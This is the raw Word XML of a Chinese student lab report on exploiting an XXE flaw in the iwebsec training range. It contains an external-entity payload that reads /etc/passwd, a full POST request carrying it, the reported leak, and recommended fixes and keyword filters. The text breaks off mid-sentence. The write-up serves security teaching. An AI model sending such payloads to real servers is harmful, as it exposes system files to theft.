          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F28FB8" wp14:editId="692E0735">
            <wp:extent cx="5616575" cy="2946400"/>
            <wp:effectExtent l="0" t="0" r="3175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6575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67514" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
    <w:p w14:paraId="17767861" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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实验（实训）数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4DB4F" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>实验环境数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E36C5" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>攻击机</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.44.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD811EF" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.44.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834ED05" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:t>http://192.168.44.128/xxe/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6175A192" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>抓包工具：</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>（监听端口</w:t>
      </w:r>
      <w:r>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C44630" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>核心实验代码数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC58BB6" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）基础</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>测试代码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EB2F43" w14:paraId="0E0FD199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8D8AB9" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
            <w:r>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;?xml version = "1.0" encoding = "UTF-8"?&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!DOCTYPE book[</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT book (title, author, year, price)&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT title (#PCDATA)&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT author (#PCDATA)&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT year (#PCDATA)&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;!ELEMENT price (#PCDATA)&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ENTITY author "</w:t>
            </w:r>
            <w:r>
              <w:t>张三</w:t>
            </w:r>
            <w:r>
              <w:t>"&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>]&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;book&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;title&gt;XML DTD</w:t>
            </w:r>
            <w:r>
              <w:t>实例</w:t>
            </w:r>
            <w:r>
              <w:t>&lt;/title&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;author&gt;&amp;author;&lt;/author&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;year&gt;2024&lt;/year&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;price&gt;29.99&lt;/price&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;/book&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FE88DC3" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞利用</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>（最终实验有效载荷）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EB2F43" w14:paraId="13648217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9327A3" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
            <w:r>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;?xml version="1.0"?&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!DOCTYPE creds[</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT username ANY&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT password ANY&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">&lt;!ENTITY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>]&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;creds&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;username&gt;&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;&lt;/username&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;password&gt;test&lt;/password&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;/creds&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11DF7916" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）完整可利用</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求包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EB2F43" w14:paraId="1B937145" w14:textId="77777777" w:rsidTr="00463664">
        <w:trPr>
          <w:trHeight w:val="5610"/>
        </w:trPr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907223" w14:textId="77777777" w:rsidR="00463664" w:rsidRDefault="002669CC">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Host: 192.168.44.128</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Accept: text/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>html,application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xhtml+xml,application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xml;q</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=0.9,*/*;q=0.8</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Accept-Language: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>zh-CN,zh;q</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Accept-Encoding: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, deflate, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:br/>
              <w:t>Connection: keep-alive</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Priority: u=0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="17970FC9" w14:textId="77777777" w:rsidR="00463664" w:rsidRDefault="00463664"/>
          <w:p w14:paraId="130ED939" w14:textId="77777777" w:rsidR="00463664" w:rsidRDefault="00463664"/>
          <w:p w14:paraId="7DAA8E90" w14:textId="77777777" w:rsidR="00463664" w:rsidRDefault="002669CC">
            <w:r>
              <w:t>Content-Type: application/xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4534F478" w14:textId="6F0A6AA7" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
            <w:r>
              <w:br/>
              <w:t>&lt;?xml version="1.0"?&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!DOCTYPE creds[</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT username ANY&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;!ELEMENT password ANY&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">&lt;!ENTITY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>]&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;creds&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;username&gt;&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;&lt;/username&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;password&gt;test&lt;/password&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;/creds&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="026D1719" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>实验现象数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BC1F2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）基础</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>测试：页面正常解析实体，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;author; </w:t>
      </w:r>
      <w:r>
        <w:t>成功替换为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>张三</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，证明</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器支持</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>实体解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC2CAA" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）漏洞利用测试：修改为</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求并植入恶意</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>后，页面输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hello + </w:t>
      </w:r>
      <w:r>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/passwd </w:t>
      </w:r>
      <w:r>
        <w:t>完整系统用户数据，漏洞利用成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A7F19" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求测试：直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求无法传参，无漏洞触发效果，验证</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求无法利用</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AE057" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
    <w:p w14:paraId="112D1FA2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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实验（实训）结论与感悟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B233BE8" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
    <w:p w14:paraId="61BDF3A5" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>实验结论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38DBE7" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>本次实</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>训通过</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>靶场</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞模块的代码审计与手工利用，明确了</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>接口场景下的核心安全缺陷及审计要点，总结如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53591A63" w14:textId="5E6FAAA2" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞核心缺陷：老旧</w:t>
      </w:r>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>默认开启外部实体加载，业务接口直接接收用户可控的</w:t>
      </w:r>
      <w:r>
        <w:t>XML POST</w:t>
      </w:r>
      <w:r>
        <w:t>数据，无关键字过滤、无安全校验，攻击者可构造恶意外部实体读取服务器敏感文件。该漏洞仅可通过</w:t>
      </w:r>
      <w:r w:rsidR="007F3516">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PO</w:t>
      </w:r>
      <w:r w:rsidR="007F3516">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ST</w:t>
      </w:r>
      <w:r>
        <w:t>请求利用，</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求因无请求体、接口</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>参数，天然无法触发漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C563044" w14:textId="2FC97985" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>接口审计重点：重点审计接收</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Content-Type: application/xml </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>接口，检查代码是否禁用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>外部实体、是否过滤</w:t>
      </w:r>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ENTITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>等恶意关键字，校验用户输入是否可控、解析结果是否直接回显。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3186748D" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）漏洞危害验证：成功利用</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞读取服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/passwd </w:t>
      </w:r>
      <w:r>
        <w:t>系统核心文件，证明高危</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞可直接造成服务器敏感信息泄露，严重威胁</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务与服务器安全。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E320284" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>）漏洞修复与安全加固方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F974BC2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>结合本次审计发现的漏洞缺陷，针对</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>高危漏洞总结可落地的修复加固方案，适配</w:t>
      </w:r>
      <w:r>
        <w:t>PHP Web</w:t>
      </w:r>
      <w:r>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>接口安全防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A422818" w14:textId="1DC9F40F" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:t>底层代码禁用外部实体（核心修复）：在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>解析代码开头添加</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>libxml_disable_entity_loader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(true)</w:t>
      </w:r>
      <w:r>
        <w:t>，强制关闭</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>外部实体加载功能，从根源杜绝外部实体调用文件、内网请求等恶意行为，彻底封堵</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞入口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3708F9A9" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:t>过滤恶意关键字：对所有用户提交的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据进行前置过滤，拦截</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ENTITY</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PUBLIC </w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>高危关键字，禁止用户自定义</w:t>
      </w:r>
      <w:r>
        <w:t>DTD</w:t>
      </w:r>
      <w:r>
        <w:t>与外部实体。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E932C" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:t>升级</w:t>
      </w:r>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>运行版本：</w:t>
      </w:r>
      <w:r>
        <w:t>PHP7.2</w:t>
      </w:r>
      <w:r>
        <w:t>及以上版本默认关闭外部实体解析，无需大量修改业务代码，可实现天然防御</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞，是低成本、高安全的加固方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40E377" w14:textId="4879CD8C" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:t>接口请求规范校验：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application/xml </w:t>
      </w:r>
      <w:r>
        <w:t>类型的</w:t>
      </w:r>
      <w:r w:rsidR="007F3516" w:rsidRPr="007F3516">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>接口增加安全校验，仅允许合</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>规</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>业务</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>结构数据接入，拒绝异常、恶意、超大体积的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>请求数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D631608" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>实训感悟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D512DE3" w14:textId="52853C04" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:t>通过本次</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞实训，我系统掌握了</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>数据传输原理、</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求交互机制及</w:t>
      </w:r>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞的完整攻击链路，深刻理解了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
